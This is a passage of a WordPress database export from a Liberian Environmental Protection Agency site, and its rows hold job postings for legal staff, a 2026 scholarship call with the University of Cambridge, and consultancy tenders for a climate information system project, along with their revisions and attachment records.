19:26:13','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5703',28,'ekms_bulletin','',0),(5704,38,'2026-01-19 19:21:59','2026-01-19 19:21:59','<strong>BACKGROUND</strong>\r\n\r\nEstablished under the Environmental Protection Agency Act (2002) the EPA is Liberia\'s principal authority for environmental management, oversees regulation, compliance, and enforcement of environmental laws in Liberia. With growing complexity in environmental governance, including land use, pollution control, EIA processes, and natural resource management—the EPA requires a Legal Officer to guide legal compliance and strengthen dispute resolution, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nTo provide administrative and research support to the legal team, ensuring efficient handling of legal matters and documentation.\r\n\r\n<strong>Key Responsibilities</strong>\r\n<ul>\r\n 	<li>Assist in drafting and reviewing contracts, agreements, and other legal documents.</li>\r\n 	<li>Conduct preliminary legal research and compile findings for review by the Legal Officer.</li>\r\n 	<li>Maintain organized case files and ensure proper documentation of legal correspondence.</li>\r\n 	<li>Support in preparing meeting notes, summaries, and reports for legal proceedings.</li>\r\n 	<li>Coordinate with internal departments to gather necessary information for legal matters.</li>\r\n 	<li>Provide logistical and administrative support for legal training sessions and workshops.</li>\r\n</ul>\r\n&nbsp;','Legal Assistant','','inherit','closed','closed','','5703-revision-v1','','','2026-01-19 19:21:59','2026-01-19 19:21:59','',5703,'https://ekmsliberia.info/?p=5704',0,'revision','',0),(5705,38,'2026-01-19 19:24:01','2026-01-19 19:24:01','','Final ToR Legal Assistant','','inherit','open','closed','','final-tor-legal-assistant','','','2026-01-19 19:24:01','2026-01-19 19:24:01','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/Final-ToR-Legal-Assistant.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5706,38,'2026-01-19 19:26:01','2026-01-19 19:26:01','<strong>BACKGROUND</strong>\r\n\r\nEstablished under the Environmental Protection Agency Act (2002) the EPA is Liberia\'s principal authority for environmental management, oversees regulation, compliance, and enforcement of environmental laws in Liberia. With growing complexity in environmental governance, including land use, pollution control, EIA processes, and natural resource management—the EPA requires a Legal Officer to guide legal compliance and strengthen dispute resolution, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nTo provide administrative and research support to the legal team, ensuring efficient handling of legal matters and documentation.\r\n\r\n<strong>Key Responsibilities</strong>\r\n<ul>\r\n 	<li>Assist in drafting and reviewing contracts, agreements, and other legal documents.</li>\r\n 	<li>Conduct preliminary legal research and compile findings for review by the Legal Officer.</li>\r\n 	<li>Maintain organized case files and ensure proper documentation of legal correspondence.</li>\r\n 	<li>Support in preparing meeting notes, summaries, and reports for legal proceedings.</li>\r\n 	<li>Coordinate with internal departments to gather necessary information for legal matters.</li>\r\n 	<li>Provide logistical and administrative support for legal training sessions and workshops.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Final-ToR-Legal-Assistant.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Legal Assistant','','inherit','closed','closed','','5703-revision-v1','','','2026-01-19 19:26:01','2026-01-19 19:26:01','',5703,'https://ekmsliberia.info/?p=5706',0,'revision','',0),(5708,38,'2026-01-20 11:47:42','2026-01-20 11:47:42','<strong>BACKGROUND</strong>\r\n\r\nEstablished under the Environmental Protection Agency Act (2002) the EPA is Liberia\'s principal authority for environmental management, oversees regulation, compliance, and enforcement of environmental laws in Liberia. With growing complexity in environmental governance, including land use, pollution control, EIA processes, and natural resource management—the EPA requires a Legal Officer to guide legal compliance and strengthen dispute resolution, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nProvide expert legal support to EPA departments to ensure compliance with national/international environmental regulations and strengthen EPA’s capacity in enforcement, litigation, contracts drafting, and dispute resolution.\r\n<h4><strong>Key Responsibilities</strong></h4>\r\n<ul>\r\n 	<li>Legal Advice &amp; Compliance: Review, interpret, and advise on legislation, regulations, standards, and permit conditions.</li>\r\n 	<li>Contracts &amp; Agreements: Draft, review, and negotiate MoUs, partnership agreements, consultancy contracts, and procurement-related documents.</li>\r\n 	<li>Litigation &amp; Enforcement: Represent EPA in administrative, civil, or criminal proceedings related to environmental violations.</li>\r\n 	<li>Policy &amp; Regulatory Reform: Support drafting or amendment of environmental laws and regulations.</li>\r\n 	<li>ADR &amp; Dispute Resolution: Collaborate on establishing or managing alternative dispute resolution mechanisms for environmental conflicts.</li>\r\n 	<li>Stakeholder Engagement &amp; Capacity Building: Liaise with external counsel, judiciary, public institutions, and communities.</li>\r\n 	<li>Reporting &amp; Administration: Submit monthly/quarterly legal updates to management and maintain accurate legal documentation.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Final-ToR-Legal-Officer-2025-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Legal Officer','','publish','closed','closed','','legal-officer','','','2026-01-20 11:47:42','2026-01-20 11:47:42','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5708',27,'ekms_bulletin','',0),(5709,38,'2026-01-20 11:42:34','2026-01-20 11:42:34','<strong>BACKGROUND</strong>\r\n\r\nEstablished under the Environmental Protection Agency Act (2002) the EPA is Liberia\'s principal authority for environmental management, oversees regulation, compliance, and enforcement of environmental laws in Liberia. With growing complexity in environmental governance, including land use, pollution control, EIA processes, and natural resource management—the EPA requires a Legal Officer to guide legal compliance and strengthen dispute resolution, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nProvide expert legal support to EPA departments to ensure compliance with national/international environmental regulations and strengthen EPA’s capacity in enforcement, litigation, contracts drafting, and dispute resolution.\r\n<h4><strong>Key Responsibilities</strong></h4>\r\n<ul>\r\n 	<li>Legal Advice &amp; Compliance: Review, interpret, and advise on legislation, regulations, standards, and permit conditions.</li>\r\n 	<li>Contracts &amp; Agreements: Draft, review, and negotiate MoUs, partnership agreements, consultancy contracts, and procurement-related documents.</li>\r\n 	<li>Litigation &amp; Enforcement: Represent EPA in administrative, civil, or criminal proceedings related to environmental violations.</li>\r\n 	<li>Policy &amp; Regulatory Reform: Support drafting or amendment of environmental laws and regulations.</li>\r\n 	<li>ADR &amp; Dispute Resolution: Collaborate on establishing or managing alternative dispute resolution mechanisms for environmental conflicts.</li>\r\n 	<li>Stakeholder Engagement &amp; Capacity Building: Liaise with external counsel, judiciary, public institutions, and communities.</li>\r\n 	<li>Reporting &amp; Administration: Submit monthly/quarterly legal updates to management and maintain accurate legal documentation.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to:','Legal Officer','','inherit','closed','closed','','5708-revision-v1','','','2026-01-20 11:42:34','2026-01-20 11:42:34','',5708,'https://ekmsliberia.info/?p=5709',0,'revision','',0),(5710,38,'2026-01-20 11:45:38','2026-01-20 11:45:38','','Final ToR Legal Officer 2025 (1)','','inherit','open','closed','','final-tor-legal-officer-2025-1','','','2026-01-20 11:45:38','2026-01-20 11:45:38','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/Final-ToR-Legal-Officer-2025-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5711,38,'2026-01-20 11:47:42','2026-01-20 11:47:42','<strong>BACKGROUND</strong>\r\n\r\nEstablished under the Environmental Protection Agency Act (2002) the EPA is Liberia\'s principal authority for environmental management, oversees regulation, compliance, and enforcement of environmental laws in Liberia. With growing complexity in environmental governance, including land use, pollution control, EIA processes, and natural resource management—the EPA requires a Legal Officer to guide legal compliance and strengthen dispute resolution, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\n<strong>Objective of the Assignment</strong>\r\n\r\nProvide expert legal support to EPA departments to ensure compliance with national/international environmental regulations and strengthen EPA’s capacity in enforcement, litigation, contracts drafting, and dispute resolution.\r\n<h4><strong>Key Responsibilities</strong></h4>\r\n<ul>\r\n 	<li>Legal Advice &amp; Compliance: Review, interpret, and advise on legislation, regulations, standards, and permit conditions.</li>\r\n 	<li>Contracts &amp; Agreements: Draft, review, and negotiate MoUs, partnership agreements, consultancy contracts, and procurement-related documents.</li>\r\n 	<li>Litigation &amp; Enforcement: Represent EPA in administrative, civil, or criminal proceedings related to environmental violations.</li>\r\n 	<li>Policy &amp; Regulatory Reform: Support drafting or amendment of environmental laws and regulations.</li>\r\n 	<li>ADR &amp; Dispute Resolution: Collaborate on establishing or managing alternative dispute resolution mechanisms for environmental conflicts.</li>\r\n 	<li>Stakeholder Engagement &amp; Capacity Building: Liaise with external counsel, judiciary, public institutions, and communities.</li>\r\n 	<li>Reporting &amp; Administration: Submit monthly/quarterly legal updates to management and maintain accurate legal documentation.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/Final-ToR-Legal-Officer-2025-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Legal Officer','','inherit','closed','closed','','5708-revision-v1','','','2026-01-20 11:47:42','2026-01-20 11:47:42','',5708,'https://ekmsliberia.info/?p=5711',0,'revision','',0),(5712,38,'2026-01-21 09:13:26','2026-01-21 09:13:26','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe Environmental Protection Agency (EPA), in partnership with the Democratising Education for Global Sustainability and Justice Programme at University of Cambridge, is again in 2026 offering 150 scholarships to professionals interested in advancing their knowledge in sustainable development law and policy. This capacity building initiative is designed to equip current and aspiring law and policy leaders with a comprehensive understanding of the legal frameworks and policies essential for implementing the United Nations\' Sustainable Development Goals (SDGs). This action-oriented course delves into developments in law and policy related to the SDGs, providing learners with the knowledge to effectively implement and report on these goals at various governance levels, in alignment with the 2030 Agenda. A significant component of the program focuses on the Paris Agreement, exploring its mechanisms and the role of law in scaling up implementation worldwide and in learners\' jurisdictions. By examining the Paris Agreement, participants gain insights into international climate commitments and strategies for national implementation. Furthermore, this knowledge is instrumental in enhancing national capacity to meet transparency requirements, develop robust monitoring and reporting systems, and effectively implement Nationally Determined Contributions (NDCs) under the Paris Agreement. The program is delivered by global experts and reflects Cambridge\'s commitment to academically rigorous standards, offering a learning experience that mirrors the university\'s values.\r\n\r\n</div>\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/2026-Call-for-Applications-DemGlobalEdu-University-of-Cambridge-EPA.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Applications-2026 Scholarship Opportunity: Democratising Education for Global Sustainability and Justice Programme at the University of Cambridge in partnership with the Environmental Protection Agency of Liberia','','publish','closed','closed','','call-for-applications-2026-scholarship-opportunity-democratising-education-for-global-sustainability-and-justice-programme-at-the-university-of-cambridge-in-partnership-with-the-environmental-protect','','','2026-01-21 09:13:26','2026-01-21 09:13:26','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5712',26,'ekms_bulletin','',0),(5713,38,'2026-01-21 09:12:00','2026-01-21 09:12:00','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe Environmental Protection Agency (EPA), in partnership with the Democratising Education for Global Sustainability and Justice Programme at University of Cambridge, is again in 2026 offering 150 scholarships to professionals interested in advancing their knowledge in sustainable development law and policy. This capacity building initiative is designed to equip current and aspiring law and policy leaders with a comprehensive understanding of the legal frameworks and policies essential for implementing the United Nations\' Sustainable Development Goals (SDGs). This action-oriented course delves into developments in law and policy related to the SDGs, providing learners with the knowledge to effectively implement and report on these goals at various governance levels, in alignment with the 2030 Agenda. A significant component of the program focuses on the Paris Agreement, exploring its mechanisms and the role of law in scaling up implementation worldwide and in learners\' jurisdictions. By examining the Paris Agreement, participants gain insights into international climate commitments and strategies for national implementation. Furthermore, this knowledge is instrumental in enhancing national capacity to meet transparency requirements, develop robust monitoring and reporting systems, and effectively implement Nationally Determined Contributions (NDCs) under the Paris Agreement. The program is delivered by global experts and reflects Cambridge\'s commitment to academically rigorous standards, offering a learning experience that mirrors the university\'s values.\r\n\r\n</div>\r\n</div>\r\n</div>','Call for Applications-2026 Scholarship Opportunity: Democratising Education for Global Sustainability and Justice Programme at the University of Cambridge in partnership with the Environmental Protection Agency of Liberia','','inherit','closed','closed','','5712-revision-v1','','','2026-01-21 09:12:00','2026-01-21 09:12:00','',5712,'https://ekmsliberia.info/?p=5713',0,'revision','',0),(5714,38,'2026-01-21 09:12:23','2026-01-21 09:12:23','','2026-Call for Applications- DemGlobalEdu- University of Cambridge-EPA','','inherit','open','closed','','2026-call-for-applications-demglobaledu-university-of-cambridge-epa','','','2026-01-21 09:12:23','2026-01-21 09:12:23','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/2026-Call-for-Applications-DemGlobalEdu-University-of-Cambridge-EPA.pdf',0,'attachment','application/pdf',0),(5715,38,'2026-01-21 09:13:26','2026-01-21 09:13:26','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe Environmental Protection Agency (EPA), in partnership with the Democratising Education for Global Sustainability and Justice Programme at University of Cambridge, is again in 2026 offering 150 scholarships to professionals interested in advancing their knowledge in sustainable development law and policy. This capacity building initiative is designed to equip current and aspiring law and policy leaders with a comprehensive understanding of the legal frameworks and policies essential for implementing the United Nations\' Sustainable Development Goals (SDGs). This action-oriented course delves into developments in law and policy related to the SDGs, providing learners with the knowledge to effectively implement and report on these goals at various governance levels, in alignment with the 2030 Agenda. A significant component of the program focuses on the Paris Agreement, exploring its mechanisms and the role of law in scaling up implementation worldwide and in learners\' jurisdictions. By examining the Paris Agreement, participants gain insights into international climate commitments and strategies for national implementation. Furthermore, this knowledge is instrumental in enhancing national capacity to meet transparency requirements, develop robust monitoring and reporting systems, and effectively implement Nationally Determined Contributions (NDCs) under the Paris Agreement. The program is delivered by global experts and reflects Cambridge\'s commitment to academically rigorous standards, offering a learning experience that mirrors the university\'s values.\r\n\r\n</div>\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/2026-Call-for-Applications-DemGlobalEdu-University-of-Cambridge-EPA.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Applications-2026 Scholarship Opportunity: Democratising Education for Global Sustainability and Justice Programme at the University of Cambridge in partnership with the Environmental Protection Agency of Liberia','','inherit','closed','closed','','5712-revision-v1','','','2026-01-21 09:13:26','2026-01-21 09:13:26','',5712,'https://ekmsliberia.info/?p=5715',0,'revision','',0),(5716,38,'2026-01-26 18:45:46','2026-01-26 18:45:46','<div class=\"page\" title=\"Page 1\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n\nThe Environmental Protection Agency (EPA), in partnership with the Democratising Education for Global Sustainability and Justice Programme at University of Cambridge, is again in 2026 offering 150 scholarships to professionals interested in advancing their knowledge in sustainable development law and policy. This capacity building initiative is designed to equip current and aspiring law and policy leaders with a comprehensive understanding of the legal frameworks and policies essential for implementing the United Nations\' Sustainable Development Goals (SDGs). This action-oriented course delves into developments in law and policy related to the SDGs, providing learners with the knowledge to effectively implement and report on these goals at various governance levels, in alignment with the 2030 Agenda. A significant component of the program focuses on the Paris Agreement, exploring its mechanisms and the role of law in scaling up implementation worldwide and in learners\' jurisdictions. By examining the Paris Agreement, participants gain insights into international climate commitments and strategies for national implementation. Furthermore, this knowledge is instrumental in enhancing national capacity to meet transparency requirements, develop robust monitoring and reporting systems, and effectively implement Nationally Determined Contributions (NDCs) under the Paris Agreement. The program is delivered by global experts and reflects Cambridge\'s commitment to academically rigorous standards, offering a learning experience that mirrors the university\'s values.\n\n</div>\n</div>\n</div>\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/2026-Call-for-Applications-DemGlobalEdu-University-of-Cambridge-EPA.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Call for Applications-2026 Scholarship Opportunity: Democratising Education for Global Sustainability and Justice Programme at the University of Cambridge in partnership with the Environmental Protection Agency of Liberia','','inherit','closed','closed','','5712-autosave-v1','','','2026-01-26 18:45:46','2026-01-26 18:45:46','',5712,'https://ekmsliberia.info/?p=5716',0,'revision','',0),(5717,38,'2026-01-26 19:27:18','2026-01-26 19:27:18','The Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe EPA received funding from the Green Climate Fund (GCF) to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 initiative funded by the GCF, African Development Bank (AfDB), and the Government of Liberia (GoL), aimed at increasing the resilience of Liberia’s population and infrastructure to climate change.” In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n2. Purpose of the Consultancy\r\n\r\nThe consultant shall design, implement, and maintain a Quality Management System (QMS) that is compliant with international standards such as ISO 9001. The primary objective of this QMS is to ensure the reliable collection, processing, and dissemination of hydrometeorological data (encompassing weather, climate, and water), guaranteeing it is timely, accurate, and verifiable to support critical services.. By accomplishing the objectives, this study will address the preparation of a comprehensive Workplan that will guide the step-by-step implementation of quality standards and capacity-building actions across partner institutions such as the Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), the EPA, and the National Disaster Management Agency (NDMA). By doing so, the consultancy supports the broader aim of the CIS project, which is to enhance Liberia’s climate resilience through reliable and actionable climate services.\r\n\r\n3. The Scope of the Services to be performed\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\nA. Assessment of Existing Systems:\r\n<ul>\r\n 	<li>Conduct a comprehensive review of existing quality control and assurance procedures across relevant institutions such as the Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environmental Protection Agency (EPA), and National Disaster Management Agency (NDMA).</li>\r\n 	<li>Evaluate the existing climate data management policies, procedures, and workflows at the EPA, LHS, LHS, and NDMA to identify strengths and areas for improvement.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/9a_reoi_international_consultant_to_develop_a_quality_management_system_qms_and_workplan_002.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop a Quality Management System (QMS), Workplan for the Climate Information System Project - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-consultancy-services-for-international-consultant-to-develop-a-quality-management-system-qms-workplan-for-the-climate-information-system-project-liberia-cis-project','','','2026-01-26 19:27:18','2026-01-26 19:27:18','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5717',25,'ekms_bulletin','',0),(5718,38,'2026-01-26 19:25:14','2026-01-26 19:25:14','The Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe EPA received funding from the Green Climate Fund (GCF) to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 initiative funded by the GCF, African Development Bank (AfDB), and the Government of Liberia (GoL), aimed at increasing the resilience of Liberia’s population and infrastructure to climate change.” In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n2. Purpose of the Consultancy\r\n\r\nThe consultant shall design, implement, and maintain a Quality Management System (QMS) that is compliant with international standards such as ISO 9001. The primary objective of this QMS is to ensure the reliable collection, processing, and dissemination of hydrometeorological data (encompassing weather, climate, and water), guaranteeing it is timely, accurate, and verifiable to support critical services.. By accomplishing the objectives, this study will address the preparation of a comprehensive Workplan that will guide the step-by-step implementation of quality standards and capacity-building actions across partner institutions such as the Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), the EPA, and the National Disaster Management Agency (NDMA). By doing so, the consultancy supports the broader aim of the CIS project, which is to enhance Liberia’s climate resilience through reliable and actionable climate services.\r\n\r\n3. The Scope of the Services to be performed\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\nA. Assessment of Existing Systems:\r\n<ul>\r\n 	<li>Conduct a comprehensive review of existing quality control and assurance procedures across relevant institutions such as the Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environmental Protection Agency (EPA), and National Disaster Management Agency (NDMA).</li>\r\n 	<li>Evaluate the existing climate data management policies, procedures, and workflows at the EPA, LHS, LHS, and NDMA to identify strengths and areas for improvement.</li>\r\n</ul>\r\nClick to:\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop a Quality Management System (QMS), Workplan for the Climate Information System Project - Liberia CIS Project','','inherit','closed','closed','','5717-revision-v1','','','2026-01-26 19:25:14','2026-01-26 19:25:14','',5717,'https://ekmsliberia.info/?p=5718',0,'revision','',0),(5719,38,'2026-01-26 19:26:15','2026-01-26 19:26:15','','9a_reoi_international_consultant_to_develop_a_quality_management_system_qms_and_workplan_002','','inherit','open','closed','','9a_reoi_international_consultant_to_develop_a_quality_management_system_qms_and_workplan_002','','','2026-01-26 19:26:15','2026-01-26 19:26:15','',0,'https://ekmsliberia.info/wp-content/uploads/2026/01/9a_reoi_international_consultant_to_develop_a_quality_management_system_qms_and_workplan_002.pdf',0,'attachment','application/pdf',0),(5720,38,'2026-01-26 19:27:18','2026-01-26 19:27:18','The Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management.\r\n<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe EPA received funding from the Green Climate Fund (GCF) to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project).\r\n\r\nThe Liberia CIS Project is a US$11,431,969 initiative funded by the GCF, African Development Bank (AfDB), and the Government of Liberia (GoL), aimed at increasing the resilience of Liberia’s population and infrastructure to climate change.” In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS).\r\n\r\nThe implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n2. Purpose of the Consultancy\r\n\r\nThe consultant shall design, implement, and maintain a Quality Management System (QMS) that is compliant with international standards such as ISO 9001. The primary objective of this QMS is to ensure the reliable collection, processing, and dissemination of hydrometeorological data (encompassing weather, climate, and water), guaranteeing it is timely, accurate, and verifiable to support critical services.. By accomplishing the objectives, this study will address the preparation of a comprehensive Workplan that will guide the step-by-step implementation of quality standards and capacity-building actions across partner institutions such as the Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), the EPA, and the National Disaster Management Agency (NDMA). By doing so, the consultancy supports the broader aim of the CIS project, which is to enhance Liberia’s climate resilience through reliable and actionable climate services.\r\n\r\n3. The Scope of the Services to be performed\r\n\r\nThe consultant will work closely with EPA through the PIU and also have the opportunity to consult with the relevant agencies and ministries (e.g., LMS, LHS, NDMA, sector ministries etc.) to gather the relevant information needed to perform the assessment as stated below.\r\n\r\nA. Assessment of Existing Systems:\r\n<ul>\r\n 	<li>Conduct a comprehensive review of existing quality control and assurance procedures across relevant institutions such as the Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environmental Protection Agency (EPA), and National Disaster Management Agency (NDMA).</li>\r\n 	<li>Evaluate the existing climate data management policies, procedures, and workflows at the EPA, LHS, LHS, and NDMA to identify strengths and areas for improvement.</li>\r\n</ul>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/9a_reoi_international_consultant_to_develop_a_quality_management_system_qms_and_workplan_002.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','EOI - Liberia - Consultancy Services for International Consultant to Develop a Quality Management System (QMS), Workplan for the Climate Information System Project - Liberia CIS Project','','inherit','closed','closed','','5717-revision-v1','','','2026-01-26 19:27:18','2026-01-26 19:27:18','',5717,'https://ekmsliberia.info/?p=5720',0,'revision','',0),(5721,38,'2026-01-26 19:39:23','2026-01-26 19:39:23','<strong>Background </strong>\r\n\r\nThe Environmental Protection Agency (EPA) in Liberia was created by an act of the Legislature on November 26, 2002, and published as a handbill on April 30, 2003, to ensure sound environmental management and sustainable use of natural resources. The EPA functions to ensure long-term economic prosperity through sustainable development and establish a legal framework for environmental management. The EPA received funding from the Green Climate Fund to implement a five-year project called \"Enhancing Climate Information Systems for Resilient Development in Liberia\" (the Liberia CIS Project). The Liberia CIS Project is a US$11,431,969 GCF, AFDB, and GOL-funded project that aims to increase the resilience of Liberia’s population and infrastructure to climate change. In particular, the project will strengthen the country’s adaptive capacities to integrate better long-term climate risk reduction and adaptation measures in national planning and development through the development of a well-functioning Multi-Hazard Impact-Based Forecasting and Early Warning System (MH-IBF-EWS). The implementation of the project will entail training and equipping the existing Liberia Meteorological Service (LMS), Liberia Hydrological Service (LHS), Environment Protection Agency (EPA) and National Disaster Management Agency (NDMA) to collect weather and climate data; introduce and maintain modelling, forecast weather events and provide early warnings systems; and scale-up evidence-based climate-informed decisionmaking, planning, and response actions Countrywide.\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>Purpose of the Consultancy</strong>\r\n\r\nThe purpose of this consultancy is to provide professional supervision and monitoring services for the renovation of the Liberia National Meteorological Station at the Roberts International Airport (RIA). This station is a critical component of Liberia’s national climate and weather monitoring infrastructure and plays a key role in generating accurate meteorological data to support evidence-based planning and risk reduction across sectors. Moreover, this consultancy aligns with the objectives of the Climate Information System (CIS) Project, which seeks to enhance Liberia’s climate resilience through the development of reliable, accessible, and user-driven climate services. By ensuring the quality, safety, and timely execution of the renovation works, this consultancy will contribute directly to strengthening national climate service delivery, improving early warning systems, supporting agriculture, infrastructure development, aviation safety, and disaster preparedness.\r\n\r\n<strong>The Scope of the Services to be performed</strong>\r\n\r\nThe Consultant shall provide a comprehensive professional services for the supervision and monitoring of the renovation works at the Liberia National Meteorological Station located at the Roberts International Airport (RIA). The services aim to ensure that all construction activities are implemented in full compliance with the approved architectural and engineering designs, technical specifications, environmental and safety standards, project timelines, and budgetary provisions.\r\n\r\n<strong>Technical Review and Site Familiarization</strong>\r\n\r\n➢  Review approved design drawings where available and or develop the required design based on the needs of the beneficiary entity, specifications, bills of quantities (BoQs), and work schedules.\r\n\r\n➢  Conduct a pre-renovation site assessment to understand the scope and sequence of renovation activities.\r\n\r\n3.2Construction Supervision and Monitoring\r\n\r\n➢  Provide day-to-day technical supervision to monitor the contractor’s adherence to design and quality standards.\r\n\r\n➢  Ensure compliance with agreed timelines and identify potential risks or delays early.\r\n\r\n</div>\r\n</div>\r\n</div>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/01/8a_reoi_professional_services_for_nmc_renovation_at_roberts_international_airport.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','EOI - Liberia - Professional Services for Supervision and Monitoring of the Renovation of the Liberia National Meteorological Station - Liberia CIS Project','','publish','closed','closed','','eoi-liberia-professional-services-for-supervision-and-monitoring-of-the-renovation-of-the-liberia-national-meteorological-station-liberia-cis-project','','','2026-01-26 19:39:23','2026-01-26 